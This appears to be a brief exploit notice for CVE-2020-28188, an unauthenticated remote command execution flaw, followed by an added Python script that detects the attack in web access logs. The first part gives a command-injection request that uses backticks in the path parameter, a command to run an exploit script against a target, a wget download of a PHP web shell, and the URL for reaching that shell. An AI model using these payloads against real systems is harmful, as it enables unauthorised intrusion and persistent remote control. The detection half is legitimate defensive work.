Unauthenticated Remote Command Execution
CVE-2020-28188
Vulnerable page: /include/makecvs.php
Vulnerable parameter: Event
Proof of Concept:
GET /tos/index.php?explorer/pathList&path=%60touch%20/tmp/file%60 HTTP/1.1
pip install requests
python3 RCE.PY --url target.com:8181
wget https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php
Shell access: http://target.com/shell.php
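
Detection logic for the requests described above, as an added example that is not part of the original page: it scans web access log lines for the Event parameter on /include/makecvs.php and the path parameter on /tos/index.php carrying shell metacharacters. The combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameters named on this page: Event on /include/makecvs.php, and
# path on the /tos/index.php request shown in the proof of concept.
WATCHED = {"/include/makecvs.php": "Event", "/tos/index.php": "path"}

# Characters that let a parameter value break out into a shell command.
SHELL_META = re.compile(r"[`;|&$<>\n\r]")

# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return [(param, decoded value)] for watched params with shell metacharacters."""
    parts = urlsplit(target)
    watched = WATCHED.get(parts.path)
    if watched is None:
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # Decode once more so values that arrive percent-encoded twice
        # are normalised before matching.
        decoded = unquote(value)
        if name == watched and SHELL_META.search(decoded):
            hits.append((name, decoded))
    return hits


def scan(lines):
    """Yield (line number, param, value) for each suspicious log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            for name, value in suspicious_params(match.group(1)):
                yield number, name, value


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2021:10:00:00 +0000] "GET /include/makecvs.php?Event=backup HTTP/1.1" 200 12',
    '192.0.2.66 - - [01/Jan/2021:10:00:05 +0000] "GET /include/makecvs.php?Event=%60id%60 HTTP/1.1" 200 0',
    '192.0.2.66 - - [01/Jan/2021:10:00:09 +0000] "GET /tos/index.php?explorer/pathList&path=%60touch%20/tmp/file%60 HTTP/1.1" 200 31',
    '192.0.2.11 - - [01/Jan/2021:10:01:00 +0000] "GET /tos/index.php?explorer/pathList&path=/mnt/share HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for number, name, value in scan(SAMPLE_LOG):
        print(f"line {number}: {name}={value!r}")
```

Parameters sent in a POST body do not appear in access logs, so this covers query-string requests only.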